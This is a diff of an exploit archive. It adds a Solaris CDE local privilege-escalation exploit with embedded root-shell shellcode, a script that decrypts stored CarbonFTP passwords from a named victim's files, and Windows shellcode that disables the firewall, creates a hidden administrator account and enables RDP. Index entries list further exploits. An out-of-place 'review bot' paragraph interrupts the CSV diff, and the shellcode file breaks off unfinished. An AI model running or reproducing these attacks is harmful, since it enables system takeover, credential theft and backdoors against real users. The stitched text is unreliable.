common configuration on the first try. 
To + * re-enable rpc.cmsd, clear its service maintenance status by running the + * following commands as root: + * # /usr/sbin/svcadm clear cde-calendar-manager + * # /usr/bin/svcs -a | grep calendar + * online 13:16:54 svc:/network/rpc/cde-calendar-manager:default + * + * Tested on: + * SunOS 5.10 Generic_147148-26 i86pc i386 i86pc (Solaris 10 1/13) + * [previous Solaris versions are also likely vulnerable] + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define INFO1 "raptor_sdtcm_conv.c - CDE sdtcm_convert LPE for Solaris/Intel" +#define INFO2 "Copyright (c) 2019-2020 Marco Ivaldi " + +#define VULN "/usr/dt/bin/sdtcm_convert" // the vulnerable program +#define ADMIN "/usr/dt/bin/sdtcm_admin" // calendar admin utility +#define BUFSIZE 2304 // size of the name/owner +#define PAYSIZE 1024 // size of the payload +#define OFFSET env_len / 2 // offset to the shellcode + +char sc[] = /* Solaris/x86 shellcode (8 + 8 + 27 = 43 bytes) */ +/* double setuid() */ +"\x31\xc0\x50\x50\xb0\x17\xcd\x91" +"\x31\xc0\x50\x50\xb0\x17\xcd\x91" +/* execve() */ +"\x31\xc0\x50\x68/ksh\x68/bin" +"\x89\xe3\x50\x53\x89\xe2\x50" +"\x52\x53\xb0\x3b\x50\xcd\x91"; + +/* globals */ +char *env[256]; +int env_pos = 0, env_len = 0; + +/* prototypes */ +int add_env(char *string); +void check_zero(int addr, char *pattern); +int search_ldso(char *sym); +int search_rwx_mem(void); +void set_val(char *buf, int pos, int val); + +/* + * main() + */ +int main(int argc, char **argv) +{ + char buf[BUFSIZE], payload[PAYSIZE]; + char platform[256], release[256], hostname[256]; + int i, payaddr; + + char *arg[3] = {"foo", "hax0r", NULL}; + int sb = ((int)argv[0] | 0xfff); /* stack base */ + int ret = search_ldso("strcpy"); /* or sprintf */ + int rwx_mem = search_rwx_mem(); /* rwx memory */ + + char cmd[1024]; + FILE *fp; + + /* print exploit information */ + fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); + + /* read command line */ + if (argc != 1) { + 
fprintf(stderr, "Usage:\n%s\n[...]\n", argv[0]); + fprintf(stderr, "Do you want to correct it? (Y/N) [Y] n\n\n"); + exit(1); + } + + /* get system information */ + sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1); + sysinfo(SI_RELEASE, release, sizeof(release) - 1); + sysinfo(SI_HOSTNAME, hostname, sizeof(release) - 1); + + /* prepare the payload (NOPs suck, but I'm too old for VOODOO stuff) */ + memset(payload, '\x90', PAYSIZE); + payload[PAYSIZE - 1] = 0x0; + memcpy(&payload[PAYSIZE - sizeof(sc)], sc, sizeof(sc)); + + /* fill the envp, keeping padding */ + add_env(payload); + add_env("HOME=/tmp"); + add_env(NULL); + + /* calculate the payload address */ + payaddr = sb - OFFSET; + + /* prepare the evil palette name */ + memset(buf, 'A', sizeof(buf)); + buf[sizeof(buf) - 1] = 0x0; + + /* fill with function address in ld.so.1, saved eip, and arguments */ + for (i = 0; i < BUFSIZE - 16; i += 4) { + set_val(buf, i, ret); /* strcpy */ + set_val(buf, i += 4, rwx_mem); /* saved eip */ + set_val(buf, i += 4, rwx_mem); /* 1st argument */ + set_val(buf, i += 4, payaddr); /* 2nd argument */ + } + + /* print some output */ + fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release); + fprintf(stderr, "Using SI_HOSTNAME\t: %s\n", hostname); + fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb); + fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem); + fprintf(stderr, "Using payload address\t: 0x%p\n", (void *)payaddr); + fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret); + + /* create the evil calendar file */ + fprintf(stderr, "Preparing the evil calendar file... 
"); + snprintf(cmd, sizeof(cmd), "%s -a -c hax0r@%s", ADMIN, hostname); + if (system(cmd) == -1) { + perror("Error creating calendar file"); + exit(1); + } + if (chmod("/usr/spool/calendar/callog.hax0r", 0660) == -1) { + perror("Error creating calendar file"); + exit(1); + } + + /* prepare the evil calendar file (badchars currently not handled) */ + fp = fopen("/usr/spool/calendar/callog.hax0r", "w"); + if (!fp) { + perror("Error preparing calendar file"); + exit(1); + } + fprintf(fp, "Version: 4\n(calendarattributes " + "(\"-//XAPIA/CSA/CALATTR//NONSGML Access List//EN\"," + "\"10:access_list\",\"world:2\")\n"); + /* buffer overflow in calendar name */ + fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Name//EN\"," + "\"5:string\",\"%s\")\n", buf); + fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Owner//EN\"," + "\"6:user\",\"fnord\")\n)"); + /* buffer overflow in calendar owner */ + /* + fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Name//EN\"," + "\"5:string\",\"hax0r\")\n"); + fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Owner//EN\"," + "\"6:user\",\"%s\")\n)", buf); + */ + fclose(fp); + + fprintf(stderr, "Done.\n"); + + /* run the vulnerable program */ + fprintf(stderr, "Exploiting... 
Please answer \"n\" when prompted.\n");
+ execve(VULN, arg, env);
+ perror("execve");
+ exit(0);
+}
+
+/*
+ * add_env(): add a variable to envp and pad if needed
+ */
+int add_env(char *string)
+{
+ int i;
+
+ /* null termination */
+ if (!string) {
+ env[env_pos] = NULL;
+ return env_len;
+ }
+
+ /* add the variable to envp */
+ env[env_pos] = string;
+ env_len += strlen(string) + 1;
+ env_pos++;
+
+ /* pad the envp using zeroes */
+ if ((strlen(string) + 1) % 4)
+ for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
+ env[env_pos] = string + strlen(string);
+ env_len++;
+ }
+
+ return env_len;
+}
+
+/*
+ * check_zero(): check an address for the presence of a 0x00
+ */
+void check_zero(int addr, char *pattern)
+{
+ if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||
+ !(addr & 0xff000000)) {
+ fprintf(stderr, "Error: %s contains a 0x00!\n", pattern);
+ exit(1);
+ }
+}
+
+/*
+ * search_ldso(): search for a symbol inside ld.so.1
+ */
+int search_ldso(char *sym)
+{
+ int addr;
+ void *handle;
+ Link_map *lm;
+
+ /* open the executable object file */
+ if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {
+ perror("dlopen");
+ exit(1);
+ }
+
+ /* get dynamic load information */
+ if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {
+ perror("dlinfo");
+ exit(1);
+ }
+
+ /* search for the address of the symbol */
+ if ((addr = (int)dlsym(handle, sym)) == NULL) {
+ fprintf(stderr, "Sorry, function %s() not found\n", sym);
+ exit(1);
+ }
+
+ /* close the executable object file */
+ dlclose(handle);
+
+ check_zero(addr - 4, sym);
+ return addr;
+}
+
+/*
+ * search_rwx_mem(): search for an RWX memory segment valid for all
+ * programs (typically, /usr/lib/ld.so.1) using the proc filesystem
+ */
+int search_rwx_mem(void)
+{
+ int fd;
+ char tmp[16];
+ prmap_t map;
+ int addr = 0, addr_old;
+
+ /* open the proc filesystem */
+ sprintf(tmp,"/proc/%d/map", (int)getpid());
+ if ((fd = open(tmp, O_RDONLY)) < 0) {
+ fprintf(stderr, "Can't open 
%s\n", tmp);
+ exit(1);
+ }
+
+ /* search for the last RWX memory segment before stack (last - 1) */
+ while (read(fd, &map, sizeof(map)))
+ if (map.pr_vaddr)
+ if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {
+ addr_old = addr;
+ addr = map.pr_vaddr;
+ }
+ close(fd);
+
+ /* add 4 to the exact address NULL bytes */
+ if (!(addr_old & 0xff))
+ addr_old |= 0x04;
+ if (!(addr_old & 0xff00))
+ addr_old |= 0x0400;
+
+ return addr_old;
+}
+
+/*
+ * set_val(): copy a dword inside a buffer (little endian)
+ */
+void set_val(char *buf, int pos, int val)
+{
+ buf[pos] = (val & 0x000000ff);
+ buf[pos + 1] = (val & 0x0000ff00) >> 8;
+ buf[pos + 2] = (val & 0x00ff0000) >> 16;
+ buf[pos + 3] = (val & 0xff000000) >> 24;
+}
\ No newline at end of file
diff --git a/exploits/windows/remote/48363.py b/exploits/windows/remote/48363.py
new file mode 100755
index 000000000..2f30aa3ce
--- /dev/null
+++ b/exploits/windows/remote/48363.py
@@ -0,0 +1,241 @@
+# Title: Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption
+# Date: 2020-04-20
+# Author: hyp3rlinx
+# Vendor:
+# CVE: CVE-2020-6857
+
+import time, string, sys, argparse, os, codecs
+
+#Fixed: updated for Python 3, the hex decode() function was not working in Python 3 version.
+#This should be compatible for Python 2 and 3 versions now, tested successfully.
+#Sample test password
+#LOOOOONGPASSWORD! = 219042273422734224782298223744247862350210947
+
+key="97F" #2431 in decimal, the weak hardcoded encryption key within the vuln program.
+chunk_sz=5 #number of bytes we must decrypt the password by.
+
+#Password is stored here:
+#C:\Users\\AppData\Roaming\Neowise\CarbonFTPProjects\.CFTP
+
+#Neowise CarbonFTP v1.4
+#Insecure Proprietary Password Encryption
+#By John Page (aka hyp3rlinx)
+#Apparition Security
+#===================================================
+
+def carbonftp_conf(conf_file):
+ p=""
+ pipe=-1
+ passwd=""
+ lst_of_passwds=[]
+ try:
+ for p in conf_file:
+ idx = p.find("Password=STRING|")
+ if idx != -1:
+ pipe = p.find("|")
+ if pipe != -1:
+ passwd = p[pipe + 2: -2]
+ print(" Password found: "+ passwd)
+ lst_of_passwds.append(passwd)
+ except Exception as e:
+ print(str(e))
+ return lst_of_passwds
+
+
+def reorder(lst):
+ k=1
+ j=0
+ for n in range(len(lst)):
+ k+=1
+ j+=1
+ try:
+ tmp = lst[n+k]
+ a = lst[n+j]
+ lst[n+j] = tmp
+ lst[n+k] = a
+ except Exception as e:
+ pass
+ return ''.join(lst)
+
+
+def dec2hex(dec):
+ tmp = str(hex(int(dec)))
+ return str(tmp[2:])
+
+
+#Updated for Python version compatibility.
+def hex2ascii(h):
+ h=h.strip()
+ passwd=""
+ try:
+ passwd = codecs.decode(h, "hex").decode("ascii")
+ except Exception as e:
+ print("[!] 
In hex2ascii(), not a valid hex string.") + exit() + return passwd + + +def chunk_passwd(passwd_lst): + lst = [] + for passwd in passwd_lst: + while passwd: + lst.append(passwd[:chunk_sz]) + passwd = passwd[chunk_sz:] + return lst + + +def strip_non_printable_char(str): + return ''.join([x for x in str if ord(x) > 31 or ord(x)==9]) + +cnt = 0 +passwd_str="" +def deob(c): + + global cnt, passwd_str + + tmp="" + + try: + tmp = int(c) - int(key, 16) + tmp = dec2hex(tmp) + except Exception as e: + print("[!] Not a valid CarbonFTP encrypted password.") + exit() + + b="" + a="" + + #Seems we can delete the second char as its most always junk. + if cnt!=1: + a = tmp[:2] + cnt+=1 + else: + b = tmp[:4] + + passwd_str += strip_non_printable_char(hex2ascii(a + b)) + hex_passwd_lst = list(passwd_str) + return hex_passwd_lst + + +def no_unique_chars(lst): + c=0 + k=1 + j=0 + for i in range(len(lst)): + k+=1 + j+=1 + try: + a = lst[i] + b = lst[i+1] + if a != b: + c+=1 + elif c==0: + print("[!] Possible one char password?: " +str(lst[0])) + return lst[0] + except Exception as e: + pass + return False + + +def decryptor(result_lst): + + global passwd_str, sz + + print(" Decrypting ... \n") + for i in result_lst: + print("[-] "+i) + time.sleep(0.1) + lst = deob(i) + + #Re-order chars to correct sequence using custom swap function (reorder). + reordered_pass = reorder(lst) + sz = len(reordered_pass) + + #Flag possible single char password. + no_unique_chars(lst) + + print("[+] PASSWORD LENGTH: " + str(sz)) + if sz == 9: + return (reordered_pass[:-1] + " | " + reordered_pass[:-2] + " | " + reordered_pass[:-3] + " | " + reordered_pass[:-4] + " | " + + reordered_pass[:-5] +" | " + reordered_pass[:-6] + " | "+ reordered_pass[:-7] + " | " + reordered_pass) + + #Shorter passwords less then nine chars will have several candidates + #as they get padded with repeating chars so we return those. 
+
+ passwd_str=""
+ return reordered_pass
+
+
+def display_cracked_passwd(sz, passwd):
+ if sz==9:
+ print("[*] PASSWORD CANDIDATES: "+ passwd + "\n")
+ else:
+ print("[*] DECRYPTED PASSWORD: "+passwd + "\n")
+
+
+def parse_args():
+ parser = argparse.ArgumentParser()
+ parser.add_argument("-u", "--user", help="Username to crack a directory of Carbon .CFTP password files")
+ parser.add_argument("-p", "--encrypted_password", help="Crack a single encrypted password")
+ return parser.parse_args()
+
+
+def main(args):
+
+ global passwd_str, sz
+ victim=""
+
+ if args.user and args.encrypted_password:
+ print("[!] Supply a victims username -u or single encrypted password -p, not both.")
+ exit()
+
+ print("[+] Neowise CarbonFTP v1.4")
+ time.sleep(0.1)
+ print("[+] CVE-2020-6857 Insecure Proprietary Password Encryption")
+ time.sleep(0.1)
+ print("[+] Version 2 Exploit fixed for Python 3 compatibility")
+ time.sleep(0.1)
+ print("[+] Discovered and cracked by hyp3rlinx")
+ time.sleep(0.1)
+ print("[+] ApparitionSec\n")
+ time.sleep(1)
+
+ #Crack a dir of carbonFTP conf files containing encrypted passwords -u flag.
+ if args.user:
+ victim = args.user
+ os.chdir("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/")
+ dir_lst = os.listdir(".")
+ for c in dir_lst:
+ f=open("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/"+c, "r")
+ #Get encrypted password from conf file
+ passwd_enc = carbonftp_conf(f)
+ #Break up into 5 byte chunks as processed by the proprietary decryption routine.
+ result_lst = chunk_passwd(passwd_enc)
+ #Decrypt the 5 byte chunks and reassemble to the cleartext password.
+ cracked_passwd = decryptor(result_lst)
+ #Print cracked password or candidates.
+ display_cracked_passwd(sz, cracked_passwd)
+ time.sleep(0.3)
+ passwd_str=""
+ f.close()
+
+
+ #Crack a single password -p flag.
+ if args.encrypted_password:
+ passwd_to_crack_lst = []
+ passwd_to_crack_lst.append(args.encrypted_password)
+ result = chunk_passwd(passwd_to_crack_lst)
+ #Print cracked password or candidates.
+ cracked_passwd = decryptor(result)
+ display_cracked_passwd(sz, cracked_passwd)
+
+
+if __name__=="__main__":
+
+ parser = argparse.ArgumentParser()
+
+ if len(sys.argv)==1:
+ parser.print_help(sys.stderr)
+ exit()
+
+ main(parse_args())
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index d9e162f6a..edc85f820 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11036,6 +11036,7 @@ id,file,description,date,author,type,platform,port
 48350,exploits/windows/local/48350.py,"Nsauditor 3.2.1.0 - Buffer Overflow (SEH+ASLR bypass (3 bytes overwrite))",2020-04-20,Cervoise,local,windows,
 48351,exploits/windows/local/48351.py,"Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)",2020-04-20,bzyo,local,windows,
 48352,exploits/windows/local/48352.txt,"Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path",2020-04-20,boku,local,windows,
+48359,exploits/solaris/local/48359.c,"Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation",2020-04-21,"Marco Ivaldi",local,solaris,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
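Review bot: `sz` is assigned only inside the loop in `decryptor`, so when `result_lst` is empty — a `.CFTP` file in the `-u` scan that contains no `Password=STRING|` line — `display_cracked_passwd(sz, cracked_passwd)` in `main` raises `NameError` and the handle `f` opened just above it is never closed. Initialising it with the other module-level state, `sz = 0` next to `passwd_str=""`, and opening each file with `with open(...) as f:` closes both gaps. As a point of style, `strip_non_printable_char(str)` shadows the builtin `str` inside that function, and the bare `exit()` calls are the site-module helper rather than `sys.exit()`, even though `sys` is already imported for `sys.argv`.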
@@ -18108,7 +18109,8 @@ id,file,description,date,author,type,platform,port
 48338,exploits/multiple/remote/48338.rb,"Apache Solr - Remote Code Execution via Velocity Template (Metasploit)",2020-04-16,Metasploit,remote,multiple,
 48343,exploits/linux/remote/48343.rb,"Nexus Repository Manager - Java EL Injection RCE (Metasploit)",2020-04-17,Metasploit,remote,linux,
 48353,exploits/linux/remote/48353.rb,"Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit)",2020-04-20,Metasploit,remote,linux,
-6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
+48363,exploits/windows/remote/48363.py,"Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption",2020-04-21,hyp3rlinx,remote,windows,
+6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
 53,exploits/cgi/webapps/53.c,"CCBILL CGI - 'ccbillx.c' 'whereami.cgi' Remote Code Execution",2003-07-10,knight420,webapps,cgi,
@@ -42591,3 +42593,10 @@ id,file,description,date,author,type,platform,port
 48342,exploits/hardware/webapps/48342.txt,"Cisco IP Phone 11.7 - Denial of service (PoC)",2020-04-17,"Jacob Baines",webapps,hardware,
 48345,exploits/php/webapps/48345.txt,"Centreon 19.10.5 - 'id' SQL Injection",2020-04-20,"Basim Alabdullah",webapps,php,
 48348,exploits/php/webapps/48348.txt,"Fork CMS 5.8.0 - Persistent Cross-Site Scripting",2020-04-20,Vulnerability-Lab,webapps,php,
+48354,exploits/php/webapps/48354.txt,"CSZ CMS 1.2.7 - Persistent Cross-Site Scripting",2020-04-21,"Metin Yunus Kandemir",webapps,php,
+48356,exploits/php/webapps/48356.txt,"PMB 5.6 - 'logid' SQL Injection",2020-04-21,41-trk,webapps,php,
+48357,exploits/php/webapps/48357.txt,"CSZ CMS 1.2.7 - 'title' HTML Injection",2020-04-21,"Metin Yunus Kandemir",webapps,php,
+48358,exploits/hardware/webapps/48358.py,"IQrouter 3.3.1 Firmware - Remote Code Execution",2020-04-21,drakylar,webapps,hardware,
+48360,exploits/json/webapps/48360.txt,"NSClient++ 0.5.2.35 - Authenticated Remote Code Execution",2020-04-21,kindredsec,webapps,json,
+48361,exploits/php/webapps/48361.txt,"jizhi CMS 1.6.7 - Arbitrary File Download",2020-04-21,jizhicms,webapps,php,
+48362,exploits/hardware/webapps/48362.txt,"P5 FNIP-8x16A FNIP-4xSH 1.0.20 - Cross-Site Request Forgery (Add Admin)",2020-04-21,LiquidWorm,webapps,hardware,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 37f30a06b..f62afe4be 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1019,3 +1019,4 @@ id,file,description,date,author,type,platform
 48229,shellcodes/windows/48229.txt,"Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)",2020-03-18,boku,shellcode,windows
 48243,shellcodes/linux/48243.txt,"Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes)",2020-03-23,Upayan,shellcode,linux
 48252,shellcodes/windows_x86-64/48252.txt,"Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes)",2020-03-25,boku,shellcode,windows_x86-64
+48355,shellcodes/windows/48355.c,"Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)",2020-04-21,boku,shellcode,windows
diff --git a/shellcodes/windows/48355.c b/shellcodes/windows/48355.c
new file mode 100644
index 000000000..c18b5ac02
--- /dev/null
+++ b/shellcodes/windows/48355.c
@@ -0,0 +1,285 @@
+## Exploit Title: Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)
+## Exploit Author: Bobby Cooke
+## Date: 2020-04-20
+## Tested on: Windows 10 Home - 1909 (x86_64), Windows 10 Pro - 1909 (x86)
+## Description: Windows Shellcode that disables the Windows firewall, adds the user 'MajinBuu' with password 'TurnU2C@ndy!!' to the system, adds the user 'MajinBuu' to the local groups 'Administrators' & 'Remote Desktop Users', and then enables the RDP Service.
+## Commands used:
+## 'netsh firewall set opmode mode=DISABLE'
+## 'net user MajinBuu TurnU2C@ndy!! /add'
+## 'net localgroup Administrators MajinBuu /add'
+## 'net localgroup "Remote Desktop Users" MajinBuu /add'
+## 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
+
+; Create stack frame
+mov ebp, esp
+sub esp, 0x30
+
+; Find kernel32.dll base address
+ xor ebx, ebx
+ mov ebx, [fs:ebx+0x30] ; EBX = Address_of_PEB
+ mov ebx, [ebx+0xC] ; EBX = Address_of_LDR
+ mov ebx, [ebx+0x1C] ; EBX = 1st entry in InitOrderModuleList / ntdll.dll
+ mov ebx, [ebx] ; EBX = 2nd entry in InitOrderModuleList / kernelbase.dll
+ mov ebx, [ebx] ; EBX = 3rd entry in InitOrderModuleList / kernel32.dll
+ mov eax, [ebx+0x8] ; EAX = &kernel32.dll / Address of kernel32.dll
+ mov [ebp-0x4], eax ; [EBP-0x04] = &kernel32.dll
+
+; Find the address of the Export Table within kernel32.dll
+ mov ebx, [eax+0x3C] ; EBX = Offset NewEXEHeader
+ add ebx, eax ; EBX = &NewEXEHeader
+ mov ebx, [ebx+0x78] ; EBX = RVA ExportTable
+ add ebx, eax ; EBX = &ExportTable
+
+; Find the address of the Name Pointer Table within kernel32.dll
+ mov edi, [ebx+0x20] ; EDI = RVA NamePointerTable
+ add edi, eax ; EDI = &NamePointerTable
+ mov [ebp-0x8], edi ; save &NamePointerTable to stack frame
+
+; Find the address of the Ordinal Table
+ mov ecx, [ebx+0x24] ; ECX = RVA OrdinalTable
+ add ecx, eax ; ECX = 
&OrdinalTable
+ mov [ebp-0xC], ecx ; save &OrdinalTable to stack-frame
+
+; Find the address of the Address Table
+ mov edx, [ebx+0x1C] ; EDX = RVA AddressTable
+ add edx, eax ; EDX = &AddressTable
+ mov [ebp-0x10], edx ; save &AddressTable to stack-frame
+
+; Find Number of Functions within the Export Table of kernel32.dll
+ mov edx, [ebx+0x14] ; EDX = Number of Functions
+ mov [ebp-0x14], edx ; save value of Number of Functions to stack-frame
+
+jmp short functions
+
+findFunctionAddr:
+; Initialize the Counter to prevent infinite loop
+ xor eax, eax ; EAX = Counter = 0
+ mov edx, [ebp-0x14] ; get value of Number of Functions from stack-frame
+; Loop through the NamePointerTable and compare our Strings to the Name Strings of kernel32.dll
+searchLoop:
+ mov edi, [ebp-0x8] ; EDI = &NamePointerTable
+ mov esi, [ebp-0x18] ; ESI = Address of String for the Symbol we are searching for
+ xor ecx, ecx ; ECX = 0x00000000
+ cld ; clear direction flag - Process strings from left to right
+ mov edi, [edi+eax*4] ; EDI = RVA NameString = [&NamePointerTable + (Counter * 4)]
+ add edi, [ebp-0x4] ; EDI = &NameString = RVA NameString + &kernel32.dll
+ add cx, 0xF ; ECX = len("GetProcAddress,0x00") = 15 = 14 char + 1 Null
+ repe cmpsb ; compare first 8 bytes of [&NameString] to "GetProcAddress,0x00"
+ jz found ; If string at [&NameString] == "GetProcAddress,0x00", then end loop
+ inc eax ; else Counter ++
+ cmp eax, edx ; Does EAX == Number of Functions? 
+ jb searchLoop ; If EAX != Number of Functions, then restart the loop
+
+found:
+; Find the address of GetProcAddress by using the last value of the Counter
+ mov ecx, [ebp-0xC] ; ECX = &OrdinalTable
+ mov edx, [ebp-0x10] ; EDX = &AddressTable
+ mov ax, [ecx + eax*2] ; AX = ordinalNumber = [&OrdinalTable + (Counter*2)]
+ mov eax, [edx + eax*4] ; EAX = RVA GetProcAddress = [&AddressTable + ordinalNumber]
+ add eax, [ebp-0x4] ; EAX = &GetProcAddress = RVA GetProcAddress + &kernel32.dll
+ ret
+
+functions:
+# Push string "GetProcAddress",0x00 onto the stack
+ xor eax, eax ; clear eax register
+ mov ax, 0x7373 ; AX is the lower 16-bits of the 32bit EAX Register
+ push eax ; ss : 73730000 // EAX = 0x00007373 // \x73=ASCII "s"
+ push 0x65726464 ; erdd : 65726464 // "GetProcAddress"
+ push 0x41636f72 ; Acor : 41636f72
+ push 0x50746547 ; PteG : 50746547
+ mov [ebp-0x18], esp ; save PTR to string at bottom of stack (ebp)
+ call findFunctionAddr ; After Return EAX will = &GetProcAddress
+# EAX = &GetProcAddress
+ mov [ebp-0x1C], eax ; save &GetProcAddress
+
+; Call GetProcAddress(&kernel32.dll, PTR "LoadLibraryA"0x00)
+ xor edx, edx ; EDX = 0x00000000
+ push edx ; null terminator for LoadLibraryA string
+ push 0x41797261 ; Ayra : 41797261 // "LoadLibraryA",0x00
+ push 0x7262694c ; rbiL : 7262694c
+ push 0x64616f4c ; daoL : 64616f4c
+ push esp ; $hModule -- push the address of the start of the string onto the stack
+ push dword [ebp-0x4] ; $lpProcName -- push base address of kernel32.dll to the stack
+ mov eax, [ebp-0x1C] ; Move the address of GetProcAddress into the EAX register
+ call eax ; Call the GetProcAddress Function. 
+ mov [ebp-0x20], eax ; save Address of LoadLibraryA
+
+; Call LoadLibraryA(PTR "msvcrt")
+; push "msvcrt",0x00 to the stack and save pointer
+ xor eax, eax ; clear eax
+ mov ax, 0x7472 ; tr : 7472
+ push eax
+ push 0x6376736D ; cvsm : 6376736D
+ push esp ; push the pointer to the string
+ mov ebx, [ebp-0x20] ; LoadLibraryA Address to ebx register
+ call ebx ; call the LoadLibraryA Function to load msvcrt.dll
+ mov [ebp-0x24], eax ; save Address of msvcrt.dll
+
+; Call GetProcAddress(msvcrt.dll, "system")
+ xor edx, edx
+ mov dx, 0x6d65 ; me : 6d65
+ push edx
+ push 0x74737973 ; tsys : 74737973
+ push esp ; push pointer to string to stack for 'system'
+ push dword [ebp-0x24] ; push base address of msvcrt.dll to stack
+ mov eax, [ebp-0x1C] ; PTR to GetProcAddress to EAX
+ call eax ; GetProcAddress
+; EAX = WSAStartup Address
+ mov [ebp-0x28], eax ; save Address of msvcrt.system
+
+; 'netsh firewall set opmode mode=DISABLE'
+xor ecx, ecx
+mov cx, 0x454c ; EL : 454c
+push ecx
+push 0x42415349 ; BASI : 42415349
+push 0x443d6564 ; D=ed : 443d6564
+push 0x6f6d2065 ; om e : 6f6d2065
+push 0x646f6d70 ; domp : 646f6d70
+push 0x6f207465 ; o te : 6f207465
+push 0x73206c6c ; s ll : 73206c6c
+push 0x61776572 ; awer : 61776572
+push 0x69662068 ; if h : 69662068
+push 0x7374656e ; sten : 7374656e
+push esp ; push pointer to string
+mov eax, [ebp-0x28] ; msvcrt.system address
+call eax ; call system
+
+; 'net user MajinBuu TurnU2C@ndy!! 
/add'
+xor ecx, ecx
+push ecx
+push 0x6464612f ; dda/ : 6464612f
+push 0x20212179 ; !!y : 20212179
+push 0x646e4043 ; dn@C : 646e4043
+push 0x32556e72 ; 2Unr : 32556e72
+push 0x75542075 ; uT u : 75542075
+push 0x75426e69 ; uBni : 75426e69
+push 0x6a614d20 ; jaM : 6a614d20
+push 0x72657375 ; resu : 72657375
+push 0x2074656e ; ten : 2074656e
+push esp ; push pointer to string
+mov eax, [ebp-0x28] ; msvcrt.system address
+call eax ; call system
+
+; 'net localgroup Administrators MajinBuu /add'
+xor ecx, ecx
+push ecx
+mov ecx, 0x64646190 ; dda : 646461
+shr ecx, 8
+push ecx
+push 0x2f207575 ; / uu : 2f207575
+push 0x426e696a ; Bnij : 426e696a
+push 0x614d2073 ; aM s : 614d2073
+push 0x726f7461 ; rota : 726f7461
+push 0x72747369 ; rtsi : 72747369
+push 0x6e696d64 ; nimd : 6e696d64
+push 0x41207075 ; A pu : 41207075
+push 0x6f72676c ; orgl : 6f72676c
+push 0x61636f6c ; acol : 61636f6c
+push 0x2074656e ; ten : 2074656e
+push esp ; push pointer to string
+mov eax, [ebp-0x28] ; msvcrt.system address
+call eax ; call system
+
+; 'net localgroup "Remote Desktop Users" MajinBuu /add'
+xor ecx, ecx
+push ecx
+mov ecx, 0x64646190 ; dda : 646461
+shr ecx, 8
+push ecx
+push 0x2f207575 ; / uu : 2f207575
+push 0x426e696a ; Bnij : 426e696a
+push 0x614d2022 ; aM " : 614d2022
+push 0x73726573 ; sres : 73726573
+push 0x5520706f ; U po : 5520706f
+push 0x746b7365 ; tkse : 746b7365
+push 0x44206574 ; D et : 44206574
+push 0x6f6d6552 ; omeR : 6f6d6552
+push 0x22207075 ; " pu : 22207075
+push 0x6f72676c ; orgl : 6f72676c
+push 0x61636f6c ; acol : 61636f6c
+push 0x2074656e ; ten : 2074656e
+push esp ; push pointer to string
+mov eax, [ebp-0x28] ; msvcrt.system address
+call eax ; call system
+
+; 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
+xor ecx, ecx
+push ecx
+push 0x662f2030 ; f/ 0 : 662f2030
+push 0x20642f20 ; d/ : 20642f20
+push 0x44524f57 ; DROW : 44524f57
+push 0x445f4745 ; D_GE : 445f4745
+push 
0x5220742f ; R t/ : 5220742f
+push 0x20736e6f ; sno : 20736e6f
+push 0x69746365 ; itce : 69746365
+push 0x6e6e6f43 ; nnoC : 6e6e6f43
+push 0x5354796e ; STyn : 5354796e
+push 0x65446620 ; eDf : 65446620
